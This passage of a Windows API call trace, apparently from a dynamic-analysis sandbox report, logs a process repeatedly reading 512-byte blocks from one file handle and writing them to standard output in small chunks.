| out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.399] GetFileType (hFile=0x50) returned 0x1 [0145.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.399] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.399] GetFileType (hFile=0x50) returned 0x1 [0145.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.399] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.399] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.399] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.399] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.399] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] GetFileType (hFile=0x50) returned 0x1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] GetFileType (hFile=0x50) returned 0x1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] GetFileType (hFile=0x50) returned 0x1 [0145.400] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0145.400] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] GetFileType (hFile=0x50) returned 0x1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] GetFileType (hFile=0x50) returned 0x1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] GetFileType (hFile=0x50) returned 0x1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] GetFileType (hFile=0x50) returned 0x1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.401] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.401] GetFileType (hFile=0x50) returned 0x1 [0145.401] _get_osfhandle (_FileHandle=1) returned 0x50 
[0145.401] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.401] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.401] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.401] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.401] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.401] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.401] GetFileType (hFile=0x50) returned 0x1 [0145.401] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.401] GetFileType (hFile=0x50) returned 0x1 [0145.401] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.401] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.401] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.401] GetFileType (hFile=0x50) returned 0x1 [0145.401] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.401] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.401] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.401] GetFileType (hFile=0x50) returned 0x1 [0145.401] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.401] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 
[0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.402] GetFileType (hFile=0x50) returned 0x1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.402] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.402] GetFileType (hFile=0x50) returned 0x1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.402] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.402] GetFileType (hFile=0x50) returned 0x1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.402] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.402] GetFileType (hFile=0x50) returned 0x1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.402] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.402] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.402] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.402] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.402] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, 
lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.402] GetFileType (hFile=0x50) returned 0x1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.402] GetFileType (hFile=0x50) returned 0x1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] GetFileType (hFile=0x50) returned 0x1 [0145.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] GetFileType (hFile=0x50) returned 0x1 [0145.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] GetFileType (hFile=0x50) returned 0x1 [0145.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] GetFileType (hFile=0x50) returned 0x1 [0145.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] GetFileType (hFile=0x50) returned 0x1 [0145.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] GetFileType (hFile=0x50) returned 0x1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.404] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.404] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.404] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.404] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] GetFileType (hFile=0x50) returned 0x1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] GetFileType (hFile=0x50) returned 0x1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] GetFileType 
(hFile=0x50) returned 0x1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] GetFileType (hFile=0x50) returned 0x1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] GetFileType (hFile=0x50) returned 0x1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] GetFileType (hFile=0x50) returned 0x1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] GetFileType (hFile=0x50) returned 0x1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] GetFileType (hFile=0x50) returned 0x1 [0145.405] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.405] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.405] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.405] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.405] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] GetFileType (hFile=0x50) returned 0x1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] GetFileType (hFile=0x50) returned 0x1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] GetFileType (hFile=0x50) returned 0x1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] GetFileType (hFile=0x50) returned 0x1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, 
lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] GetFileType (hFile=0x50) returned 0x1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] GetFileType (hFile=0x50) returned 0x1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] GetFileType (hFile=0x50) returned 0x1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] GetFileType (hFile=0x50) returned 0x1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.406] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.406] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.406] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.406] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] GetFileType (hFile=0x50) returned 0x1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] GetFileType (hFile=0x50) returned 0x1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] GetFileType (hFile=0x50) returned 0x1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] GetFileType (hFile=0x50) returned 0x1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] GetFileType (hFile=0x50) returned 0x1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] GetFileType (hFile=0x50) returned 0x1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] WriteFile (in: 
hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] GetFileType (hFile=0x50) returned 0x1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] GetFileType (hFile=0x50) returned 0x1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.407] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.407] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.407] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.407] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] GetFileType (hFile=0x50) returned 0x1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] GetFileType (hFile=0x50) returned 0x1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.407] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0145.407] GetFileType (hFile=0x50) returned 0x1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] GetFileType (hFile=0x50) returned 0x1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] GetFileType (hFile=0x50) returned 0x1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] GetFileType (hFile=0x50) returned 0x1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] GetFileType (hFile=0x50) returned 0x1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 
